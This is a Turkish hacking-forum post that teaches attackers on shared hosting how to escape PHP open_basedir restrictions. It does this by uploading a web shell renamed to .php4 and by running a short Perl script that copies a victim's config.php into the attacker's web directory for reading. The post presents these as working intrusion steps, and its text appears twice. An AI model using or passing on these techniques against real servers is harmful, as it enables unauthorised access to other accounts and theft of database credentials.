Sting Hack 2
Spys-Z
- Katılım
- 2 Ocak 2016
- Mesajlar
- 216
- Tepkime puanı
- 0
- Puanları
- 0
Open_basedir Bypass
Shell’de bulunan “Open_basedir” değerleri server sahibinin php’de kullanıcıları bulundukları dizine hapsetmek için kullanılır. Bu ayarlarda yapılan hatalar bize bypass etme şansı tanır.
Open_basedir: /home/kullanıcıadı:/usr/lib/php:/usr/php4/lib/php:/usr/local/lib/php:/usr/local/php4/lib/php:/tmp
Örnekte görüldüğü gibi Open_basedir değerleri php4 destekliyor. Shell uzantımızı “shelladı.php4” olarak değiştirip servere upload ettiğimizde php server 4. versiyona çekilecek ve Safe Mode; OFF konuma geçecektir.
Symlink ile Dosya Okumak
#!/usr/bin/perl -w
use File::Copy;
copy(“/home/victim/public_html/includes/config.php”,”/home/youruser/public_html/oku.txt”);
Bu ufacık perl scriptiyle şansınız varsa hedef dosyayı çekebilirsiniz.
Kullanımı; Kodları .pl olarak kaydedin, servere upload edin ve komut satırına perl dosyadı.pl komutu verin.. Çektiğiniz dosya oku.txt’ye vuracaktır.
Shell’de bulunan “Open_basedir” değerleri server sahibinin php’de kullanıcıları bulundukları dizine hapsetmek için kullanılır. Bu ayarlarda yapılan hatalar bize bypass etme şansı tanır.
Open_basedir: /home/kullanıcıadı:/usr/lib/php:/usr/php4/lib/php:/usr/local/lib/php:/usr/local/php4/lib/php:/tmp
Örnekte görüldüğü gibi Open_basedir değerleri php4 destekliyor. Shell uzantımızı “shelladı.php4” olarak değiştirip servere upload ettiğimizde php server 4. versiyona çekilecek ve Safe Mode; OFF konuma geçecektir.
Symlink ile Dosya Okumak
#!/usr/bin/perl -w
use File::Copy;
copy(“/home/victim/public_html/includes/config.php”,”/home/youruser/public_html/oku.txt”);
Bu ufacık perl scriptiyle şansınız varsa hedef dosyayı çekebilirsiniz.
Kullanımı; Kodları .pl olarak kaydedin, servere upload edin ve komut satırına perl dosyadı.pl komutu verin.. Çektiğiniz dosya oku.txt’ye vuracaktır.